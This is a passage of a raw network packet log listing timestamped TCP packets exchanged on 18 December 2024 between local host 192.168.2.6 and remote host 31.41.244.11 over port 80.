                                                                                                                                                              Dec 18, 2024 11:47:14.807053089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.807082891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.807534933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.807586908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.807754040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.807800055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.808734894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.808779955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.808813095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.808856964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.810264111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.810321093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.810331106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.810374022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.811332941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.811383009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.811467886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.811515093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.812350988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.812407017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.812437057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.812475920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.813572884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.813608885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.813627005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.813659906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.814827919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.814856052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.814877987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.814917088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.816000938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.816044092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.816091061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.816134930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.817240953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.817295074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.817327976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.817364931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.818362951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.818428993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.818435907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.818486929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.819597006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.819645882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.819664001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.819700956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.820745945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.820806980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.820874929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.820924997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.822046041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.822114944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.822195053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.822241068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.823139906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.823200941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.823251009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.823293924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.824457884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.824470997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.824543953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.825699091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.825711012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.825759888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.826941013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.826997995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.827053070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.827102900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.828048944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.828104019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.828192949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.828236103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.829212904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.829253912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.829277039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.829319000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.830833912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.830878973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.830894947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.830918074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.832228899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.832293034 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.832298994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.832331896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.833195925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.833241940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.833262920 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.833307981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.834100962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.834144115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.834191084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.834230900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.835241079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.835287094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.835335970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.835377932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.836644888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.836692095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.836827040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.836874962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.838399887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.838453054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.838463068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.838505030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.839536905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.839550018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.839591980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.839628935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.840351105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.840408087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.840472937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.840513945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.841305971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.841362000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.841391087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.841439962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.842566967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.842632055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.842643976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.842690945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.843683004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.843739986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.843795061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.843836069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.844907045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.845000029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.845019102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.845043898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.846252918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.846309900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.846379995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.846429110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.847342968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.847394943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.847480059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.847523928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.848510981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.848566055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.848598003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.848635912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.849700928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.849756002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.849813938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.849852085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.850935936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.850981951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.851007938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.851051092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.852133989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.852179050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.852243900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.852283955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.853337049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.853389025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.853425980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.853463888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.854547024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.854598045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.854687929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.854729891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.855859041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.855930090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.855957985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.856004000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.857043982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.857091904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.857188940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.857229948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.858350992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.858393908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.858403921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.858442068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.859391928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.859445095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.859518051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.859561920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.860600948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.860650063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.860683918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.860723972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.861813068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.861857891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.862042904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.862085104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.863167048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.863209963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.863241911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.863276958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.864176035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.864223003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.864288092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.864331961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.865411997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.865459919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.865467072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.865525961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.994112015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.994199038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.994220972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.994255066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.994352102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.994364023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.994393110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.994419098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.995503902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.995516062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.995563984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.996644974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.996691942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.998016119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.998064995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.998126984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.998167038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.998637915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.998681068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.998749971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.998789072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.999731064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.999792099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:14.999829054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:14.999871969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.002223015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.002276897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.002290964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.002331972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.002464056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.002482891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.002505064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.002532959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.003253937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.003293991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.003374100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.003417015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.004390001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.004436970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.004470110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.004503012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.005573988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.005585909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.005625010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.006742001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.006787062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.007097006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.007137060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.008127928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.008140087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.008177996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.009099960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.009145021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.009268045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.009316921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.010240078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.010291100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.010349989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.010390043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.011392117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.011431932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.011487961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.011604071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.012695074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.012747049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.012782097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.012825012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.013868093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.013919115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.013921976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.013978004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.015067101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.015124083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.015126944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.015185118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.016156912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.016202927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.016207933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.016267061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.020406008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.020417929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.020428896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.020468950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.020520926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.020605087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.020616055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.020627022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.020648956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.020689011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.020847082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.020896912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.021087885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.021131039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.022020102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.022066116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.022095919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.022139072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.023160934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.023205996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.023251057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.023296118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.024312973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.024360895 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.024600983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.024647951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.025489092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.025541067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.025615931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.025660992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.026652098 CET804980631.41.244.11192.168.2.6
